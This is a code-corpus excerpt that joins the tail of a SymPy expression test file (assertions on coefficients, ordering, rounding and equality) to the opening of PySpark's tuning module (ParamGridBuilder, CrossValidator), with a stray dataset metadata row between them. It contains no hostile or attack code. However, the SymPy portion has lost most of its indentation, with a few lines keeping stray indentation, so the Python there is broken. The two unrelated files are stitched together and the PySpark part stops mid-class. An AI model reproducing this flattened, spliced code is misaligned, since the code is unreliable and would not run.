assert m._new_rawargs(x, y, n).is_commutative is False
assert m._new_rawargs(x, n, reeval=False).is_commutative is False
assert m._new_rawargs(S.One) is S.One
def test_2127():
assert Add(evaluate=False) == 0
assert Mul(evaluate=False) == 1
assert Mul(x + y, evaluate=False).is_Add
def test_free_symbols():
# free_symbols should return the free symbols of an object
assert S(1).free_symbols == set()
assert (x).free_symbols == set([x])
assert Integral(x, (x, 1, y)).free_symbols == set([y])
assert (-Integral(x, (x, 1, y))).free_symbols == set([y])
assert meter.free_symbols == set()
assert (meter**x).free_symbols == set([x])
def test_issue2201():
x = Symbol('x', commutative=False)
assert x*sqrt(2)/sqrt(6) == x*sqrt(3)/3
def test_as_coeff_Mul():
assert Integer(3).as_coeff_Mul() == (Integer(3), Integer(1))
assert Rational(3, 4).as_coeff_Mul() == (Rational(3, 4), Integer(1))
assert Float(5.0).as_coeff_Mul() == (Float(5.0), Integer(1))
assert (Integer(3)*x).as_coeff_Mul() == (Integer(3), x)
assert (Rational(3, 4)*x).as_coeff_Mul() == (Rational(3, 4), x)
assert (Float(5.0)*x).as_coeff_Mul() == (Float(5.0), x)
assert (Integer(3)*x*y).as_coeff_Mul() == (Integer(3), x*y)
assert (Rational(3, 4)*x*y).as_coeff_Mul() == (Rational(3, 4), x*y)
assert (Float(5.0)*x*y).as_coeff_Mul() == (Float(5.0), x*y)
assert (x).as_coeff_Mul() == (S.One, x)
assert (x*y).as_coeff_Mul() == (S.One, x*y)
def test_as_coeff_Add():
assert Integer(3).as_coeff_Add() == (Integer(3), Integer(0))
assert Rational(3, 4).as_coeff_Add() == (Rational(3, 4), Integer(0))
assert Float(5.0).as_coeff_Add() == (Float(5.0), Integer(0))
assert (Integer(3) + x).as_coeff_Add() == (Integer(3), x)
assert (Rational(3, 4) + x).as_coeff_Add() == (Rational(3, 4), x)
assert (Float(5.0) + x).as_coeff_Add() == (Float(5.0), x)
assert (Integer(3) + x + y).as_coeff_Add() == (Integer(3), x + y)
assert (Rational(3, 4) + x + y).as_coeff_Add() == (Rational(3, 4), x + y)
assert (Float(5.0) + x + y).as_coeff_Add() == (Float(5.0), x + y)
assert (x).as_coeff_Add() == (S.Zero, x)
assert (x*y).as_coeff_Add() == (S.Zero, x*y)
def test_expr_sorting():
f, g = symbols('f,g', cls=Function)
exprs = [1/x**2, 1/x, sqrt(sqrt(x)), sqrt(x), x, sqrt(x)**3, x**2]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [x, 2*x, 2*x**2, 2*x**3, x**n, 2*x**n, sin(x), sin(x)**n,
sin(x**2), cos(x), cos(x**2), tan(x)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [x + 1, x**2 + x + 1, x**3 + x**2 + x + 1]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [S(4), x - 3*I/2, x + 3*I/2, x - 4*I + 1, x + 4*I + 1]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [f(x), g(x), exp(x), sin(x), cos(x), factorial(x)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [Tuple(x, y), Tuple(x, z), Tuple(x, y, z)]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [[3], [1, 2]]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [[1, 2], [2, 3]]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [[1, 2], [1, 2, 3]]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [{x: -y}, {x: y}]
assert sorted(exprs, key=default_sort_key) == exprs
exprs = [set([1]), set([1, 2])]
assert sorted(exprs, key=default_sort_key) == exprs
def test_as_ordered_factors():
f, g = symbols('f,g', cls=Function)
assert x.as_ordered_factors() == [x]
assert (2*x*x**n*sin(x)*cos(x)).as_ordered_factors() \
== [Integer(2), x, x**n, sin(x), cos(x)]
args = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
expr = Mul(*args)
assert expr.as_ordered_factors() == args
A, B = symbols('A,B', commutative=False)
assert (A*B).as_ordered_factors() == [A, B]
assert (B*A).as_ordered_factors() == [B, A]
def test_as_ordered_terms():
f, g = symbols('f,g', cls=Function)
assert x.as_ordered_terms() == [x]
assert (sin(x)**2*cos(x) + sin(x)*cos(x)**2 + 1).as_ordered_terms() \
== [sin(x)**2*cos(x), sin(x)*cos(x)**2, 1]
args = [f(1), f(2), f(3), f(1, 2, 3), g(1), g(2), g(3), g(1, 2, 3)]
expr = Add(*args)
assert expr.as_ordered_terms() == args
assert (1 + 4*sqrt(3)*pi*x).as_ordered_terms() == [4*pi*x*sqrt(3), 1]
assert ( 2 + 3*I).as_ordered_terms() == [2, 3*I]
assert (-2 + 3*I).as_ordered_terms() == [-2, 3*I]
assert ( 2 - 3*I).as_ordered_terms() == [2, -3*I]
assert (-2 - 3*I).as_ordered_terms() == [-2, -3*I]
assert ( 4 + 3*I).as_ordered_terms() == [4, 3*I]
assert (-4 + 3*I).as_ordered_terms() == [-4, 3*I]
assert ( 4 - 3*I).as_ordered_terms() == [4, -3*I]
assert (-4 - 3*I).as_ordered_terms() == [-4, -3*I]
f = x**2*y**2 + x*y**4 + y + 2
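    # "lex" compares exponent vectors left to right, "grlex" compares total
    # degree first; the "rev-" variants yield the reversed orderings, as the
    # four assertions below show.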
assert f.as_ordered_terms(order="lex") == [x**2*y**2, x*y**4, y, 2]
assert f.as_ordered_terms(order="grlex") == [x*y**4, x**2*y**2, y, 2]
assert f.as_ordered_terms(order="rev-lex") == [2, y, x*y**4, x**2*y**2]
assert f.as_ordered_terms(order="rev-grlex") == [2, y, x**2*y**2, x*y**4]
def test_sort_key_atomic_expr():
from sympy.physics.units import m, s
assert sorted([-m, s], key=lambda arg: arg.sort_key()) == [-m, s]
def test_issue_1100():
# first subs and limit gives NaN
a = x/y
assert a._eval_interval(x, 0, oo)._eval_interval(y, oo, 0) is S.NaN
# second subs and limit gives NaN
assert a._eval_interval(x, 0, oo)._eval_interval(y, 0, oo) is S.NaN
# difference gives S.NaN
a = x - y
assert a._eval_interval(x, 1, oo)._eval_interval(y, oo, 1) is S.NaN
raises(ValueError, lambda: x._eval_interval(x, None, None))
def test_primitive():
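    # primitive() splits expr into (positive rational content, primitive part)
    # with expr == content * primitive_part; Floats keep a content of 1 unless
    # another coefficient forces a common denominator (see the 4.0*x cases).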
assert (3*(x + 1)**2).primitive() == (3, (x + 1)**2)
assert (6*x + 2).primitive() == (2, 3*x + 1)
assert (x/2 + 3).primitive() == (S(1)/2, x + 6)
eq = (6*x + 2)*(x/2 + 3)
assert eq.primitive()[0] == 1
eq = (2 + 2*x)**2
assert eq.primitive()[0] == 1
assert (4.0*x).primitive() == (1, 4.0*x)
assert (4.0*x + y/2).primitive() == (S.Half, 8.0*x + y)
assert (-2*x).primitive() == (2, -x)
assert Add(5*z/7, 0.5*x, 3*y/2, evaluate=False).primitive() == \
(S(1)/14, 7.0*x + 21*y + 10*z)
for i in [S.Infinity, S.NegativeInfinity, S.ComplexInfinity]:
assert (i + x/3).primitive() == \
(S(1)/3, i + x)
assert (S.Infinity + 2*x/3 + 4*y/7).primitive() == \
(S(1)/21, 14*x + 12*y + oo)
assert S.Zero.primitive() == (S.One, S.Zero)
def test_issue_2744():
a = 1 + x
assert (2*a).extract_multiplicatively(a) == 2
assert (4*a).extract_multiplicatively(2*a) == 2
assert ((3*a)*(2*a)).extract_multiplicatively(a) == 6*a
def test_is_constant():
from sympy.solvers.solvers import checksol
    assert Sum(x, (x, 1, 10)).is_constant() is True
    assert Sum(x, (x, 1, n)).is_constant() is False
    assert Sum(x, (x, 1, n)).is_constant(y) is True
    assert Sum(x, (x, 1, n)).is_constant(n) is False
    assert Sum(x, (x, 1, n)).is_constant(x) is True
    eq = a*cos(x)**2 + a*sin(x)**2 - a
    assert eq.is_constant() is True
assert eq.subs({x: pi, a: 2}) == eq.subs({x: pi, a: 3}) == 0
assert x.is_constant() is False
assert x.is_constant(y) is True
    assert checksol(x, x, Sum(x, (x, 1, n))) is False
f = Function('f')
assert checksol(x, x, f(x)) is False
p = symbols('p', positive=True)
assert Pow(x, S(0), evaluate=False).is_constant() is True # == 1
assert Pow(S(0), x, evaluate=False).is_constant() is False # == 0 or 1
assert Pow(S(0), p, evaluate=False).is_constant() is True # == 1
assert (2**x).is_constant() is False
assert Pow(S(2), S(3), evaluate=False).is_constant() is True
z1, z2 = symbols('z1 z2', zero=True)
assert (z1 + 2*z2).is_constant() is True
assert meter.is_constant() is True
assert (3*meter).is_constant() is True
assert (x*meter).is_constant() is False
def test_equals():
assert (-3 - sqrt(5) + (-sqrt(10)/2 - sqrt(2)/2)**2).equals(0)
assert (x**2 - 1).equals((x + 1)*(x - 1))
assert (cos(x)**2 + sin(x)**2).equals(1)
assert (a*cos(x)**2 + a*sin(x)**2).equals(a)
r = sqrt(2)
assert (-1/(r + r*x) + 1/r/(1 + x)).equals(0)
assert factorial(x + 1).equals((x + 1)*factorial(x))
assert sqrt(3).equals(2*sqrt(3)) is False
assert (sqrt(5)*sqrt(3)).equals(sqrt(3)) is False
assert (sqrt(5) + sqrt(3)).equals(0) is False
assert (sqrt(5) + pi).equals(0) is False
assert meter.equals(0) is False
assert (3*meter**2).equals(0) is False
eq = -(-1)**(S(3)/4)*6**(S(1)/4) + (-6)**(S(1)/4)*I
if eq != 0: # if canonicalization makes this zero, skip the test
assert eq.equals(0)
assert sqrt(x).equals(0) is False
# from integrate(x*sqrt(1+2*x), x);
# diff is zero only when assumptions allow
i = 2*sqrt(2)*x**(S(5)/2)*(1 + 1/(2*x))**(S(5)/2)/5 + \
2*sqrt(2)*x**(S(3)/2)*(1 + 1/(2*x))**(S(5)/2)/(-6 - 3/x)
ans = sqrt(2*x + 1)*(6*x**2 + x - 1)/15
diff = i - ans
assert diff.equals(0) is False
assert diff.subs(x, -S.Half/2) == 7*sqrt(2)/120
# there are regions for x for which the expression is True, for
# example, when x < -1/2 or x > 0 the expression is zero
p = Symbol('p', positive=True)
assert diff.subs(x, p).equals(0) is True
assert diff.subs(x, -1).equals(0) is True
# prove via minimal_polynomial or self-consistency
eq = sqrt(1 + sqrt(3)) + sqrt(3 + 3*sqrt(3)) - sqrt(10 + 6*sqrt(3))
assert eq.equals(0)
q = 3**Rational(1, 3) + 3
p = expand(q**3)**Rational(1, 3)
assert (p - q).equals(0)
# issue 3730
# eq = q*x + q/4 + x**4 + x**3 + 2*x**2 - S(1)/3
# z = eq.subs(x, solve(eq, x)[0])
q = symbols('q')
z = (q*(-sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12)/2 - sqrt((2*q - S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/6)/2 - S(1)/4) + q/4 + (-sqrt(-2*(-(q
- S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q
- S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/6)/2 - S(1)/4)**4 + (-sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q -
S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/6)/2 - S(1)/4)**3 + 2*(-sqrt(-2*(-(q - S(7)/8)**S(2)/8 -
S(2197)/13824)**(S(1)/3) - S(13)/12)/2 - sqrt((2*q -
S(7)/4)/sqrt(-2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/12) + 2*(-(q - S(7)/8)**S(2)/8 - S(2197)/13824)**(S(1)/3) -
S(13)/6)/2 - S(1)/4)**2 - S(1)/3)
assert z.equals(0)
def test_random():
from sympy import posify, lucas
assert posify(x)[0]._random() is not None
assert lucas(n)._random(2, -2, 0, -1, 1) is None
def test_round():
from sympy.abc import x
assert Float('0.1249999').round(2) == 0.12
d20 = 12345678901234567890
ans = S(d20).round(2)
assert ans.is_Float and ans == d20
ans = S(d20).round(-2)
assert ans.is_Float and ans == 12345678901234567900
assert S('1/7').round(4) == 0.1429
assert S('.[12345]').round(4) == 0.1235
assert S('.1349').round(2) == 0.13
n = S(12345)
ans = n.round()
assert ans.is_Float
assert ans == n
ans = n.round(1)
assert ans.is_Float
assert ans == n
ans = n.round(4)
assert ans.is_Float
assert ans == n
assert n.round(-1) == 12350
r = n.round(-4)
assert r == 10000
# in fact, it should equal many values since __eq__
# compares at equal precision
assert all(r == i for i in range(9984, 10049))
assert n.round(-5) == 0
assert (pi + sqrt(2)).round(2) == 4.56
assert (10*(pi + sqrt(2))).round(-1) == 50
raises(TypeError, lambda: round(x + 2, 2))
assert S(2.3).round(1) == 2.3
e = S(12.345).round(2)
assert e == round(12.345, 2)
assert type(e) is Float
assert (Float(.3, 3) + 2*pi).round() == 7
assert (Float(.3, 3) + 2*pi*100).round() == 629
assert (Float(.03, 3) + 2*pi/100).round(5) == 0.09283
assert (Float(.03, 3) + 2*pi/100).round(4) == 0.0928
assert (pi + 2*E*I).round() == 3 + 5*I
assert S.Zero.round() == 0
a = (Add(1, Float('1.' + '9'*27, ''), evaluate=0))
assert a.round(10) == Float('3.0000000000', '')
assert a.round(25) == Float('3.0000000000000000000000000', '')
assert a.round(26) == Float('3.00000000000000000000000000', '')
assert a.round(27) == Float('2.999999999999999999999999999', '')
assert a.round(30) == Float('2.999999999999999999999999999', '')
raises(TypeError, lambda: x.round())
# exact magnitude of 10
assert str(S(1).round()) == '1.'
assert str(S(100).round()) == '100.'
# applied to real and imaginary portions
assert (2*pi + E*I).round() == 6 + 3*I
assert (2*pi + I/10).round() == 6
assert (pi/10 + 2*I).round() == 2*I
# the lhs re and im parts are Float with dps of 2
# and those on the right have dps of 15 so they won't compare
# equal unless we use string or compare components (which will
# then coerce the floats to the same precision) or re-create
# the floats
assert str((pi/10 + E*I).round(2)) == '0.31 + 2.72*I'
assert (pi/10 + E*I).round(2).as_real_imag() == (0.31, 2.72)
assert (pi/10 + E*I).round(2) == Float(0.31, 2) + I*Float(2.72, 3)
# issue 3815
assert (I**(I + 3)).round(3) == Float('-0.208', '')*I
def test_extract_branch_factor():
assert exp_polar(2.0*I*pi).extract_branch_factor() == (1, 1)
def test_identity_removal():
assert Add.make_args(x + 0) == (x,)
assert Mul.make_args(x*1) == (x,)
def test_float_0():
assert Float(0.0) + 1 == Float(1.0)
@XFAIL
def test_float_0_fail():
assert Float(0.0)*x == Float(0.0)
assert (x + Float(0.0)).is_Add
def test_issue_3226():
ans = (b**2 + z**2 - (b*(a + b*t) + z*(c + t*z))**2/(
(a + b*t)**2 + (c + t*z)**2))/sqrt((a + b*t)**2 + (c + t*z)**2)
e = sqrt((a + b*t)**2 + (c + z*t)**2)
assert diff(e, t, 2) == ans
    assert e.diff(t, 2) == ans
assert diff(e, t, 2, simplify=False) != ans
| bsd-3-clause | -2,231,647,852,518,754,800 | 32.378131 | 92 | 0.537793 | false |
nlalevee/spark | python/pyspark/ml/tuning.py | 6 | 26126 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import itertools
import numpy as np
from multiprocessing.pool import ThreadPool
from pyspark import since, keyword_only
from pyspark.ml import Estimator, Model
from pyspark.ml.common import _py2java
from pyspark.ml.param import Params, Param, TypeConverters
from pyspark.ml.param.shared import HasParallelism, HasSeed
from pyspark.ml.util import *
from pyspark.ml.wrapper import JavaParams
from pyspark.sql.functions import rand
__all__ = ['ParamGridBuilder', 'CrossValidator', 'CrossValidatorModel', 'TrainValidationSplit',
'TrainValidationSplitModel']
class ParamGridBuilder(object):
r"""
Builder for a param grid used in grid search-based model selection.
>>> from pyspark.ml.classification import LogisticRegression
>>> lr = LogisticRegression()
>>> output = ParamGridBuilder() \
... .baseOn({lr.labelCol: 'l'}) \
... .baseOn([lr.predictionCol, 'p']) \
... .addGrid(lr.regParam, [1.0, 2.0]) \
... .addGrid(lr.maxIter, [1, 5]) \
... .build()
>>> expected = [
... {lr.regParam: 1.0, lr.maxIter: 1, lr.labelCol: 'l', lr.predictionCol: 'p'},
... {lr.regParam: 2.0, lr.maxIter: 1, lr.labelCol: 'l', lr.predictionCol: 'p'},
... {lr.regParam: 1.0, lr.maxIter: 5, lr.labelCol: 'l', lr.predictionCol: 'p'},
... {lr.regParam: 2.0, lr.maxIter: 5, lr.labelCol: 'l', lr.predictionCol: 'p'}]
>>> len(output) == len(expected)
True
>>> all([m in expected for m in output])
True
.. versionadded:: 1.4.0
"""
def __init__(self):
self._param_grid = {}
@since("1.4.0")
def addGrid(self, param, values):
"""
        Adds the given list of candidate values for the given param to the grid.
"""
self._param_grid[param] = values
return self
@since("1.4.0")
def baseOn(self, *args):
"""
Sets the given parameters in this grid to fixed values.
Accepts either a parameter dictionary or a list of (parameter, value) pairs.
"""
if isinstance(args[0], dict):
self.baseOn(*args[0].items())
else:
for (param, value) in args:
self.addGrid(param, [value])
return self
@since("1.4.0")
def build(self):
"""
Builds and returns all combinations of parameters specified
by the param grid.
"""
keys = self._param_grid.keys()
grid_values = self._param_grid.values()
return [dict(zip(keys, prod)) for prod in itertools.product(*grid_values)]
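# Editor's sketch (not part of the original module): the grid expansion in
# build() above is plain itertools.product over the candidate values. The
# function below mirrors it on ordinary dicts; the names are illustrative
# assumptions, not pyspark API.
def _example_grid_expansion():
    """Illustrative only: expand {'regParam': [1.0, 2.0], 'maxIter': [1, 5]}."""
    import itertools
    param_grid = {'regParam': [1.0, 2.0], 'maxIter': [1, 5]}
    keys = list(param_grid.keys())
    values = list(param_grid.values())
    # One dict per point of the Cartesian product -> 4 combinations here.
    return [dict(zip(keys, combo)) for combo in itertools.product(*values)]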
class ValidatorParams(HasSeed):
"""
Common params for TrainValidationSplit and CrossValidator.
"""
estimator = Param(Params._dummy(), "estimator", "estimator to be cross-validated")
estimatorParamMaps = Param(Params._dummy(), "estimatorParamMaps", "estimator param maps")
evaluator = Param(
Params._dummy(), "evaluator",
"evaluator used to select hyper-parameters that maximize the validator metric")
def setEstimator(self, value):
"""
Sets the value of :py:attr:`estimator`.
"""
return self._set(estimator=value)
def getEstimator(self):
"""
Gets the value of estimator or its default value.
"""
return self.getOrDefault(self.estimator)
def setEstimatorParamMaps(self, value):
"""
Sets the value of :py:attr:`estimatorParamMaps`.
"""
return self._set(estimatorParamMaps=value)
def getEstimatorParamMaps(self):
"""
Gets the value of estimatorParamMaps or its default value.
"""
return self.getOrDefault(self.estimatorParamMaps)
def setEvaluator(self, value):
"""
Sets the value of :py:attr:`evaluator`.
"""
return self._set(evaluator=value)
def getEvaluator(self):
"""
Gets the value of evaluator or its default value.
"""
return self.getOrDefault(self.evaluator)
@classmethod
def _from_java_impl(cls, java_stage):
"""
Return Python estimator, estimatorParamMaps, and evaluator from a Java ValidatorParams.
"""
# Load information from java_stage to the instance.
estimator = JavaParams._from_java(java_stage.getEstimator())
evaluator = JavaParams._from_java(java_stage.getEvaluator())
epms = [estimator._transfer_param_map_from_java(epm)
for epm in java_stage.getEstimatorParamMaps()]
return estimator, epms, evaluator
def _to_java_impl(self):
"""
Return Java estimator, estimatorParamMaps, and evaluator from this Python instance.
"""
gateway = SparkContext._gateway
cls = SparkContext._jvm.org.apache.spark.ml.param.ParamMap
java_epms = gateway.new_array(cls, len(self.getEstimatorParamMaps()))
for idx, epm in enumerate(self.getEstimatorParamMaps()):
java_epms[idx] = self.getEstimator()._transfer_param_map_to_java(epm)
java_estimator = self.getEstimator()._to_java()
java_evaluator = self.getEvaluator()._to_java()
return java_estimator, java_epms, java_evaluator
class CrossValidator(Estimator, ValidatorParams, HasParallelism, MLReadable, MLWritable):
"""
K-fold cross validation performs model selection by splitting the dataset into a set of
    non-overlapping, randomly partitioned folds which are used as separate training and test
    datasets. For example, with k=3 folds, K-fold cross validation will generate 3 (training, test)
    dataset pairs,
each of which uses 2/3 of the data for training and 1/3 for testing. Each fold is used as the
test set exactly once.
>>> from pyspark.ml.classification import LogisticRegression
>>> from pyspark.ml.evaluation import BinaryClassificationEvaluator
>>> from pyspark.ml.linalg import Vectors
>>> dataset = spark.createDataFrame(
... [(Vectors.dense([0.0]), 0.0),
... (Vectors.dense([0.4]), 1.0),
... (Vectors.dense([0.5]), 0.0),
... (Vectors.dense([0.6]), 1.0),
... (Vectors.dense([1.0]), 1.0)] * 10,
... ["features", "label"])
>>> lr = LogisticRegression()
>>> grid = ParamGridBuilder().addGrid(lr.maxIter, [0, 1]).build()
>>> evaluator = BinaryClassificationEvaluator()
>>> cv = CrossValidator(estimator=lr, estimatorParamMaps=grid, evaluator=evaluator,
... parallelism=2)
>>> cvModel = cv.fit(dataset)
>>> cvModel.avgMetrics[0]
0.5
>>> evaluator.evaluate(cvModel.transform(dataset))
0.8333...
.. versionadded:: 1.4.0
"""
numFolds = Param(Params._dummy(), "numFolds", "number of folds for cross validation",
typeConverter=TypeConverters.toInt)
@keyword_only
def __init__(self, estimator=None, estimatorParamMaps=None, evaluator=None, numFolds=3,
seed=None, parallelism=1):
"""
__init__(self, estimator=None, estimatorParamMaps=None, evaluator=None, numFolds=3,\
seed=None, parallelism=1)
"""
super(CrossValidator, self).__init__()
self._setDefault(numFolds=3, parallelism=1)
kwargs = self._input_kwargs
self._set(**kwargs)
@keyword_only
@since("1.4.0")
def setParams(self, estimator=None, estimatorParamMaps=None, evaluator=None, numFolds=3,
seed=None, parallelism=1):
"""
setParams(self, estimator=None, estimatorParamMaps=None, evaluator=None, numFolds=3,\
seed=None, parallelism=1):
        Sets params for the cross validator.
"""
kwargs = self._input_kwargs
return self._set(**kwargs)
@since("1.4.0")
def setNumFolds(self, value):
"""
Sets the value of :py:attr:`numFolds`.
"""
return self._set(numFolds=value)
@since("1.4.0")
def getNumFolds(self):
"""
Gets the value of numFolds or its default value.
"""
return self.getOrDefault(self.numFolds)
def _fit(self, dataset):
est = self.getOrDefault(self.estimator)
epm = self.getOrDefault(self.estimatorParamMaps)
numModels = len(epm)
eva = self.getOrDefault(self.evaluator)
nFolds = self.getOrDefault(self.numFolds)
seed = self.getOrDefault(self.seed)
h = 1.0 / nFolds
randCol = self.uid + "_rand"
df = dataset.select("*", rand(seed).alias(randCol))
metrics = [0.0] * numModels
pool = ThreadPool(processes=min(self.getParallelism(), numModels))
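        # Each row's rand() value r is uniform on [0, 1); fold i uses the rows
        # with i*h <= r < (i+1)*h as the validation set, so every row lands in
        # exactly one validation fold and in the training set of the other
        # nFolds - 1 folds.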
for i in range(nFolds):
validateLB = i * h
validateUB = (i + 1) * h
condition = (df[randCol] >= validateLB) & (df[randCol] < validateUB)
validation = df.filter(condition).cache()
train = df.filter(~condition).cache()
def singleTrain(paramMap):
model = est.fit(train, paramMap)
# TODO: duplicate evaluator to take extra params from input
metric = eva.evaluate(model.transform(validation, paramMap))
return metric
currentFoldMetrics = pool.map(singleTrain, epm)
for j in range(numModels):
metrics[j] += (currentFoldMetrics[j] / nFolds)
validation.unpersist()
train.unpersist()
if eva.isLargerBetter():
bestIndex = np.argmax(metrics)
else:
bestIndex = np.argmin(metrics)
bestModel = est.fit(dataset, epm[bestIndex])
return self._copyValues(CrossValidatorModel(bestModel, metrics))
@since("1.4.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
        and some extra params. This creates a deep copy of
the embedded paramMap, and copies the embedded and extra parameters over.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
newCV = Params.copy(self, extra)
if self.isSet(self.estimator):
newCV.setEstimator(self.getEstimator().copy(extra))
# estimatorParamMaps remain the same
if self.isSet(self.evaluator):
newCV.setEvaluator(self.getEvaluator().copy(extra))
return newCV
@since("2.3.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@classmethod
@since("2.3.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java CrossValidator, create and return a Python wrapper of it.
Used for ML persistence.
"""
estimator, epms, evaluator = super(CrossValidator, cls)._from_java_impl(java_stage)
numFolds = java_stage.getNumFolds()
seed = java_stage.getSeed()
parallelism = java_stage.getParallelism()
# Create a new instance of this stage.
py_stage = cls(estimator=estimator, estimatorParamMaps=epms, evaluator=evaluator,
numFolds=numFolds, seed=seed, parallelism=parallelism)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java CrossValidator. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
estimator, epms, evaluator = super(CrossValidator, self)._to_java_impl()
_java_obj = JavaParams._new_java_obj("org.apache.spark.ml.tuning.CrossValidator", self.uid)
_java_obj.setEstimatorParamMaps(epms)
_java_obj.setEvaluator(evaluator)
_java_obj.setEstimator(estimator)
_java_obj.setSeed(self.getSeed())
_java_obj.setNumFolds(self.getNumFolds())
_java_obj.setParallelism(self.getParallelism())
return _java_obj
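# Editor's sketch (not part of the original module): the MLWritable/MLReadable
# mix-ins above give CrossValidator a save/load round-trip. The path and the
# overwrite() call are illustrative assumptions about the standard MLWriter API.
def _example_cv_persistence(cv, path="/tmp/example_cv"):
    """Illustrative only: persist a configured CrossValidator and reload it."""
    cv.write().overwrite().save(path)   # JavaMLWriter returned by write() above
    return CrossValidator.load(path)    # classmethod provided by MLReadable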
class CrossValidatorModel(Model, ValidatorParams, MLReadable, MLWritable):
"""
CrossValidatorModel contains the model with the highest average cross-validation
metric across folds and uses this model to transform input data. CrossValidatorModel
also tracks the metrics for each param map evaluated.
.. versionadded:: 1.4.0
"""
def __init__(self, bestModel, avgMetrics=[]):
super(CrossValidatorModel, self).__init__()
#: best model from cross validation
self.bestModel = bestModel
#: Average cross-validation metrics for each paramMap in
#: CrossValidator.estimatorParamMaps, in the corresponding order.
self.avgMetrics = avgMetrics
def _transform(self, dataset):
return self.bestModel.transform(dataset)
@since("1.4.0")
def copy(self, extra=None):
"""
Creates a copy of this instance with a randomly generated uid
and some extra params. This copies the underlying bestModel,
creates a deep copy of the embedded paramMap, and
copies the embedded and extra parameters over.
:param extra: Extra parameters to copy to the new instance
:return: Copy of this instance
"""
if extra is None:
extra = dict()
bestModel = self.bestModel.copy(extra)
avgMetrics = self.avgMetrics
return CrossValidatorModel(bestModel, avgMetrics)
@since("2.3.0")
def write(self):
"""Returns an MLWriter instance for this ML instance."""
return JavaMLWriter(self)
@classmethod
@since("2.3.0")
def read(cls):
"""Returns an MLReader instance for this class."""
return JavaMLReader(cls)
@classmethod
def _from_java(cls, java_stage):
"""
Given a Java CrossValidatorModel, create and return a Python wrapper of it.
Used for ML persistence.
"""
bestModel = JavaParams._from_java(java_stage.bestModel())
estimator, epms, evaluator = super(CrossValidatorModel, cls)._from_java_impl(java_stage)
py_stage = cls(bestModel=bestModel).setEstimator(estimator)
py_stage = py_stage.setEstimatorParamMaps(epms).setEvaluator(evaluator)
py_stage._resetUid(java_stage.uid())
return py_stage
def _to_java(self):
"""
Transfer this instance to a Java CrossValidatorModel. Used for ML persistence.
:return: Java object equivalent to this instance.
"""
sc = SparkContext._active_spark_context
# TODO: persist average metrics as well
_java_obj = JavaParams._new_java_obj("org.apache.spark.ml.tuning.CrossValidatorModel",
self.uid,
self.bestModel._to_java(),
_py2java(sc, []))
estimator, epms, evaluator = super(CrossValidatorModel, self)._to_java_impl()
_java_obj.set("evaluator", evaluator)
_java_obj.set("estimator", estimator)
_java_obj.set("estimatorParamMaps", epms)
return _java_obj
class TrainValidationSplit(Estimator, ValidatorParams, HasParallelism, MLReadable, MLWritable):
"""
.. note:: Experimental
Validation for hyper-parameter tuning. Randomly splits the input dataset into train and
    validation sets, and uses the evaluation metric on the validation set to select the best model.
Similar to :class:`CrossValidator`, but only splits the set once.
>>> from pyspark.ml.classification import LogisticRegression
>>> from pyspark.ml.evaluation import BinaryClassificationEvaluator
>>> from pyspark.ml.linalg import Vectors
>>> dataset = spark.createDataFrame(
... [(Vectors.dense([0.0]), 0.0),
... (Vectors.dense([0.4]), 1.0),
... (Vectors.dense([0.5]), 0.0),
... (Vectors.dense([0.6]), 1.0),
... (Vectors.dense([1.0]), 1.0)] * 10,
... ["features", "label"])
>>> lr = LogisticRegression()
>>> grid = ParamGridBuilder().addGrid(lr.maxIter, [0, 1]).build()
>>> evaluator = BinaryClassificationEvaluator()
>>> tvs = TrainValidationSplit(estimator=lr, estimatorParamMaps=grid, evaluator=evaluator,
... parallelism=2)
>>> tvsModel = tvs.fit(dataset)
>>> evaluator.evaluate(tvsModel.transform(dataset))
0.8333...
.. versionadded:: 2.0.0
"""
trainRatio = Param(Params._dummy(), "trainRatio", "Param for ratio between train and\
validation data. Must be between 0 and 1.", typeConverter=TypeConverters.toFloat)
@keyword_only
